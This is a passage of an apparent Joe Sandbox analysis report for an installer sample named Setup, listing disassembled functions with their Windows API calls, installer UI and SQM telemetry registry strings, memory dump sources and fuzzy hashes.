                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: __calloc_crt$FileInfoSleepStartupType
                                                                                              • String ID:
                                                                                              • API String ID: 591920814-0
                                                                                              APIs
                                                                                                • Part of subcall function 6C5DBAE2: InitializeCriticalSectionAndSpinCount.KERNEL32(?,80000040,00000000,00000000,6C5DBA57,00000000,?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5DBAFB
                                                                                              • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5DBA86
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5DBA9D
                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5DBAB4
                                                                                              • GetLastError.KERNEL32(?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5E2739
                                                                                              • GetLastError.KERNEL32(?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5E276E
                                                                                              • CloseHandle.KERNEL32(?,00000000,?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5E27F4
                                                                                              • CloseHandle.KERNEL32(?,00000000,?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5E2801
                                                                                              • CloseHandle.KERNEL32(?,00000000,?,?,00000000,?,6C5D8733,?,0000000C,6C5DBCB8,6C5D0000), ref: 6C5E2812
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseCreateEventHandle$ErrorLast$CountCriticalInitializeSectionSpin
                                                                                              • String ID:
                                                                                              • API String ID: 2704725777-0
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: memset
                                                                                              • String ID:
                                                                                              • API String ID: 2221118986-0
                                                                                              APIs
                                                                                              • RegOpenKeyExW.ADVAPI32(00000000,?,00000000,000F003F,?,Software\Microsoft\SQMClient\Windows,80000002,CabSessionAfterSize), ref: 6C5E7AE6
                                                                                              • RegEnumValueW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 6C5E7C4C
                                                                                              • RegQueryInfoKeyW.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6C5E7B3D
                                                                                                • Part of subcall function 6C5E77B8: EtwTraceMessage.NTDLL ref: 6C5E781A
                                                                                                • Part of subcall function 6C5D1967: malloc.MSVCRT(?,6C5F0554), ref: 6C5D1979
                                                                                              • RegDeleteValueW.ADVAPI32(00000057,00000000,00000000,00000000,00000026,6C5E5AB8), ref: 6C5E7D12
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value$DeleteEnumInfoMessageOpenQueryTracemalloc
                                                                                              • String ID: CabSessionAfterSize$Software\Microsoft\SQMClient\Windows$W
                                                                                              • API String ID: 3944082161-4242814227
                                                                                              APIs
                                                                                                • Part of subcall function 63960324: SendMessageW.USER32(?,00000437,00000000,?), ref: 63960344
                                                                                              • _memset.LIBCMT ref: 6395D8B6
                                                                                              • SendMessageW.USER32(?,0000043A,00000001,?), ref: 6395D8D9
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6395D81A: __EH_prolog3.LIBCMT ref: 6395D821
                                                                                                • Part of subcall function 63960353: GetWindowTextLengthW.USER32(?), ref: 6396035B
                                                                                                • Part of subcall function 63960353: SendMessageW.USER32(?,000000C2,?,00000000), ref: 63960377
                                                                                                • Part of subcall function 63950D3D: _memset.LIBCMT ref: 63950D6A
                                                                                                • Part of subcall function 63950D3D: SendMessageW.USER32(?,00000444,00000001,?), ref: 63950D93
                                                                                                • Part of subcall function 63950E35: _memset.LIBCMT ref: 63950E62
                                                                                                • Part of subcall function 63950E35: SendMessageW.USER32(?,00000444,00000001,00000074), ref: 63950E92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: MessageSend$_memset$H_prolog3$LengthTextWindow
                                                                                              • String ID: $IDS_INSTALLATION_BLOCKERS$IDS_PRE_INSTALLATION_WARNINGS$IDS_SUCCESS_BLOCKERS_LIST_HEADER$t
                                                                                              • API String ID: 808874516-693864943
                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 6C5DE49A
                                                                                                • Part of subcall function 6C5D18E5: _vsnwprintf.MSVCRT ref: 6C5D1913
                                                                                              • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,Function_00007AF4), ref: 6C5E05DD
                                                                                              • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,Function_00007AF4), ref: 6C5E05F1
                                                                                                • Part of subcall function 6C5DE552: RegOpenKeyExW.ADVAPI32(?,80000001,00000000,-00020005,?,00000000,?,?,?,?,6C5DE526,80000001,?,?), ref: 6C5DE5A8
                                                                                              Strings
                                                                                              • Software\Microsoft\SQMClient\Windows\DisabledSessions, xrefs: 6C5E0668
                                                                                              • %s\%s\%s, xrefs: 6C5DE4C5
                                                                                              • Software\Microsoft\SQMClient, xrefs: 6C5DE4C0
                                                                                              • Sampling, xrefs: 6C5DE4BA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Time$System$FileOpen_vsnwprintfmemset
                                                                                              • String ID: %s\%s\%s$Sampling$Software\Microsoft\SQMClient$Software\Microsoft\SQMClient\Windows\DisabledSessions
                                                                                              • API String ID: 3792293845-3320126751
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63954B31
                                                                                                • Part of subcall function 63953AD4: __EH_prolog3.LIBCMT ref: 63953ADB
                                                                                                • Part of subcall function 6395396A: __EH_prolog3.LIBCMT ref: 63953971
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6395434E: __EH_prolog3.LIBCMT ref: 63954355
                                                                                                • Part of subcall function 63951F81: __EH_prolog3.LIBCMT ref: 63951F88
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: DiskSpaceInfo$ProcessListBox$ProcessStatusIcon$RefreshButton$ServiceListBox$ServiceStatusIcon
                                                                                              • API String ID: 431132790-2340012964
                                                                                              • Opcode ID: 31325e66cf687b08ef806661e58bc35f2ea7d64c0ea408c8fb9908ced208104e
                                                                                              • Instruction ID: 2ffb15810f5a15d084048a4726b57acef62726460342c2e3dbdeeaa0fcb2e35f
                                                                                              • Opcode Fuzzy Hash: 31325e66cf687b08ef806661e58bc35f2ea7d64c0ea408c8fb9908ced208104e
                                                                                              • Instruction Fuzzy Hash: 7D715F7190424CEFDB00DBE8C944BDEB7E8AF29728F188199F558E7281D734DA499F21
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63953ADB
                                                                                                • Part of subcall function 6395E8E8: __EH_prolog3.LIBCMT ref: 6395E8EF
                                                                                                • Part of subcall function 6394D76F: __EH_prolog3.LIBCMT ref: 6394D776
                                                                                                • Part of subcall function 6395381C: __EH_prolog3.LIBCMT ref: 63953823
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3
                                                                                              • String ID: File$Hide$Static$SubTitle$SysLink$Title
                                                                                              • API String ID: 431132790-4216723965
                                                                                              • Opcode ID: 9ef7dc48868f55bbc119c679f4b0ea76c6f60d77e41ff0579629b5334208c155
                                                                                              • Instruction ID: fcc71bb91b72c992a66c42bef48781fa51f580886ccd9ca071082246b0ebafbd
                                                                                              • Opcode Fuzzy Hash: 9ef7dc48868f55bbc119c679f4b0ea76c6f60d77e41ff0579629b5334208c155
                                                                                              • Instruction Fuzzy Hash: 0461397190024DEFDF00DBA8C944BDEB7B8AF19728F188198F414EB282C775EA44DB61
                                                                                              APIs
                                                                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00000004,00000FA0,?,00000000,00000000), ref: 6C5D28C4
                                                                                              • memset.MSVCRT ref: 6C5D3C7D
                                                                                              • OpenMutexW.KERNEL32(00100000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 6C5D3CB1
                                                                                              • CreateMutexW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 6C5D3CC0
                                                                                              • GetLastError.KERNEL32 ref: 6C5E3E29
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Mutex$CountCreateCriticalErrorInitializeLastOpenSectionSpinmemset
                                                                                              • String ID: Local\SqmLock_%s
                                                                                              • API String ID: 435864437-4290917916
                                                                                              • Opcode ID: c725941a7353ef35e200d20b35b6b62d54623984ee613ff2564e3dcf794153b7
                                                                                              • Instruction ID: 2c1c65e6b70f949ffc4268167ecf1b7a24eec7466b42e5cc0b33bcb0b1af789d
                                                                                              • Opcode Fuzzy Hash: c725941a7353ef35e200d20b35b6b62d54623984ee613ff2564e3dcf794153b7
                                                                                              • Instruction Fuzzy Hash: EE41E030A00304EFCB508F598D88F9A7AF9BB49348F5604A9E595E7A61C770DCC88F58
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(SensApi.dll,00000000,?), ref: 6C5D4452
                                                                                              • GetProcAddress.KERNEL32(00000000,IsNetworkAlive), ref: 6C5D4468
                                                                                              • FreeLibrary.KERNEL32(00000000), ref: 6C5D447F
                                                                                              • GetLastError.KERNEL32 ref: 6C5DF8D5
                                                                                              • GetLastError.KERNEL32 ref: 6C5DF912
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastLibrary$AddressFreeLoadProc
                                                                                              • String ID: IsNetworkAlive$SensApi.dll
                                                                                              • API String ID: 1529210728-555838347
                                                                                              • Opcode ID: 876b4cd0803108691802b36d900625dedc8dda483025abb4d6da22b8180a7076
                                                                                              • Instruction ID: e1e710d969dcaf9b427f0ccec936f1143356f45335bbaa0494c2f15fc5ec537a
                                                                                              • Opcode Fuzzy Hash: 876b4cd0803108691802b36d900625dedc8dda483025abb4d6da22b8180a7076
                                                                                              • Instruction Fuzzy Hash: EE11E032241350AFCB448F99CC08F8B3ABDBB85316B170540F924C2951C730E8858BAD
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(kernel32.dll,00000000,6C5F0180,?,6C5D270F,00000000,?,6C5D26C6,?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30), ref: 6C5D2732
                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 6C5D2748
                                                                                              • FreeLibrary.KERNEL32(00000000,?,6C5D270F,00000000,?,6C5D26C6,?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?), ref: 6C5D2761
                                                                                              • GetLastError.KERNEL32(?,6C5D270F,00000000,?,6C5D26C6,?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?), ref: 6C5DF9D0
                                                                                              • GetLastError.KERNEL32(?,6C5D270F,00000000,?,6C5D26C6,?,?,6C5D19CB,Microsoft\Windows\SoftwareQualityMetricsClient,6C5F0180,00000000,?,6C5D1C30,?,?,?), ref: 6C5DFA0D
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastLibrary$AddressFreeLoadProc
                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                              • API String ID: 1529210728-3024904723
                                                                                              • Opcode ID: fc29a4fde76ff99380080c38c1f47b566de63009a7e3dc114eafad1db5bfa117
                                                                                              • Instruction ID: cb2d1d689653566ef24dd0275610fc8f6ad8a619e5ddedde626f51361d506a93
                                                                                              • Opcode Fuzzy Hash: fc29a4fde76ff99380080c38c1f47b566de63009a7e3dc114eafad1db5bfa117
                                                                                              • Instruction Fuzzy Hash: B911E132201341ABCB959B59CD48E9B3BB9FB86396B434051F924C6961C730EC448F6D
                                                                                              APIs
                                                                                              • __EH_prolog3.LIBCMT ref: 63959B53
                                                                                                • Part of subcall function 6394C3BC: __EH_prolog3.LIBCMT ref: 6394C3C3
                                                                                                • Part of subcall function 6394C3BC: GetCommandLineW.KERNEL32(0000001C,63959B69,?,00000008,6395A8A4), ref: 6394C3C8
                                                                                              Strings
                                                                                              • IDS_ROLLBACK_PROGRESS_BAR_HEADER, xrefs: 63959B9C
                                                                                              • IDS_CREATE_LAYOUT_PROGRESS_BAR_HEADER, xrefs: 63959B87
                                                                                              • IDS_UNINSTALL_PROGRESS_BAR_HEADER, xrefs: 63959B95
                                                                                              • IDS_INSTALL_PROGRESS_BAR_HEADER, xrefs: 63959B5F
                                                                                              • IDS_UNINSTALLPATCH_PROGRESS_BAR_HEADER, xrefs: 63959B80
                                                                                              • IDS_REPAIR_PROGRESS_BAR_HEADER, xrefs: 63959B8E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: H_prolog3$CommandLine
                                                                                              • String ID: IDS_CREATE_LAYOUT_PROGRESS_BAR_HEADER$IDS_INSTALL_PROGRESS_BAR_HEADER$IDS_REPAIR_PROGRESS_BAR_HEADER$IDS_ROLLBACK_PROGRESS_BAR_HEADER$IDS_UNINSTALLPATCH_PROGRESS_BAR_HEADER$IDS_UNINSTALL_PROGRESS_BAR_HEADER
                                                                                              • API String ID: 1384747822-3246460586
                                                                                              • Opcode ID: 9b4aa51e76f2b4394e446039d6914b27d301f34aa5ba557a1932b199e733a8a4
                                                                                              • Instruction ID: b24343afe53adf7162d529f420feee6175d961f47be495e0dd66235289390acf
                                                                                              • Opcode Fuzzy Hash: 9b4aa51e76f2b4394e446039d6914b27d301f34aa5ba557a1932b199e733a8a4
                                                                                              • Instruction Fuzzy Hash: B9018FF242070B8BFB20DF7CC6456693676FB9AF79F980509F010AB285DA32D5A08F11
                                                                                              APIs
                                                                                              • LoadLibraryW.KERNEL32(advapi32,?,6C5D19A1,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D2484
                                                                                              • GetProcAddress.KERNEL32(00000000,TraceMessage), ref: 6C5D24A1
                                                                                              • GetProcAddress.KERNEL32(00000000,TraceMessageVa), ref: 6C5D24C0
                                                                                              • FreeLibrary.KERNEL32(00000000,?,6C5D19A1,00000000,?,6C5D1C30,?,?,?,6C5D1C70,0000002C), ref: 6C5D24D0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryProc$FreeLoad
                                                                                              • String ID: TraceMessage$TraceMessageVa$advapi32
                                                                                              • API String ID: 2256533930-3542275927
                                                                                              • Opcode ID: 75157431c5970b5d6e2cc6fb5f751df54769fcd73ab22c6db0d76d2040b36fb6
                                                                                              • Instruction ID: 3ff80364aff62007c737d1ce69be288d32caff16817e5443891288da62b15e06
                                                                                              • Opcode Fuzzy Hash: 75157431c5970b5d6e2cc6fb5f751df54769fcd73ab22c6db0d76d2040b36fb6
                                                                                              • Instruction Fuzzy Hash: CBF04F726013919BCF888B6CAD49B573BF8B7C6765B9B011BE828C2A05C77094419F6C
                                                                                              APIs
                                                                                              • CallNextHookEx.USER32(?,00000005,?,?), ref: 6394E9CF
                                                                                              • UnhookWindowsHookEx.USER32(?), ref: 6394E9FD
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Hook$CallNextUnhookWindows
                                                                                              • String ID:
                                                                                              • API String ID: 969045306-0
                                                                                              • Opcode ID: 33d97b4016e0fd1ffd07de1c0738f71c0ab4645b7d1a106a3d8d96e583adc05e
                                                                                              • Instruction ID: a05d54123b88de78016993d2d078f2b01605702864e03f3ce4a552ef4769accd
                                                                                              • Opcode Fuzzy Hash: 33d97b4016e0fd1ffd07de1c0738f71c0ab4645b7d1a106a3d8d96e583adc05e
                                                                                              • Instruction Fuzzy Hash: 10415B31A40B09EFEB10EF28C888E9977B9FF02B55F148514F465DA1A2D331E954CF00
                                                                                              APIs
                                                                                              • GetKeyState.USER32(00000010), ref: 63950B58
                                                                                              • GetParent.USER32 ref: 63950B79
                                                                                              • GetParent.USER32 ref: 63950B8C
                                                                                              • SendMessageW.USER32(00000000,000006DB,00000000,00000000), ref: 63950B9E
                                                                                              • GetParent.USER32(?), ref: 63950BDB
                                                                                              • SendMessageW.USER32(00000000,000006DA,00000000,00000000), ref: 63950BEF
                                                                                              • GetParent.USER32(000000FF), ref: 63950BFA
                                                                                              • SendMessageW.USER32(00000000,000006DD,000000FF,000000FF), ref: 63950C08
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635226428.0000000063941000.00000020.00000001.01000000.00000011.sdmp, Offset: 63940000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635097263.0000000063940000.00000002.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635415289.000000006397F000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635547854.0000000063980000.00000008.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635631210.0000000063982000.00000004.00000001.01000000.00000011.sdmp
                                                                                              • Associated: 00000004.00000002.2635742018.0000000063985000.00000002.00000001.01000000.00000011.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_63940000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: Parent$MessageSend$State
                                                                                              • String ID:
                                                                                              • API String ID: 1493399426-0
                                                                                              • Opcode ID: 3524e43cf1364cdddfbc0382ca69dc123dd733160d3c124181f21fc919820654
                                                                                              • Instruction ID: 7c4f37caefdc569d51fdbdc8a3b0be1249dddef3a0ea88ca8c6b111db19114c2
                                                                                              • Opcode Fuzzy Hash: 3524e43cf1364cdddfbc0382ca69dc123dd733160d3c124181f21fc919820654
                                                                                              • Instruction Fuzzy Hash: 2821AE34904209BFEF11EBA4CC4AB9DBFB8EB027ADF108254F161AA1E1D7749661CF50
                                                                                              APIs
                                                                                              • malloc.MSVCRT ref: 6C5D17F6
                                                                                              • _callnewh.MSVCRT ref: 6C5E4473
                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 6C5E44AC
                                                                                              • _CxxThrowException.MSVCRT(00000001,6C5EE290), ref: 6C5E44BA
                                                                                              • _callnewh.MSVCRT ref: 6C5E44C3
                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 6C5E44FC
                                                                                              • _CxxThrowException.MSVCRT(00000001,6C5EE290), ref: 6C5E450A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000004.00000002.2635960608.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true
                                                                                              • Associated: 00000004.00000002.2635854338.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636151386.000000006C5F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000004.00000002.2636285243.000000006C5F1000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_4_2_6c5d0000_Setup.jbxd
                                                                                              Similarity
                                                                                              • API ID: ExceptionThrow_callnewhstd::bad_exception::bad_exception$malloc
                                                                                              • String ID:
                                                                                              • API String ID: 2452255883-0
                                                                                              • Opcode ID: 8eca3809b62caa4370d656490e4a7dae9b74aae29612f411f7fea02f3214ea25
                                                                                              • Instruction ID: 9dfdc407bf4866f328916fe1bf8f49170b5fa8f5277aaff51dc46152c8914a48
                                                                                              • Opcode Fuzzy Hash: 8eca3809b62caa4370d656490e4a7dae9b74aae29612f411f7fea02f3214ea25
                                                                                              • Instruction Fuzzy Hash: 8411E932A0421CA6DF0997B0EC459DE3F799FC831CF154455EC21E5D51EFB1DE0A9690
                                                                                              APIs
                                                                                                • Part of subcall function 6C5D1967: malloc.MSVCRT(?,6C5F0554), ref: 6C5D1979
                                                                                              • CreateFileW.KERNEL32(6C5DACC8,C0000000,00000000,00000000,00000001,00000002,00002080,00000000,00000000,?,00000000,00000010,?,00000000,00000010,00000094), ref: 6C5DA465
                                                                                              • WriteFile.KERNEL32(000003E0,00000000,?,6C5DACC8,00000000,?,?), ref: 6C5DA488
                                                                                              • CloseHandle.KERNEL32(000003E0,?,?), ref: 6C5DA4A8
                                                                                              Strings
                                                                                              Memory Dump Source
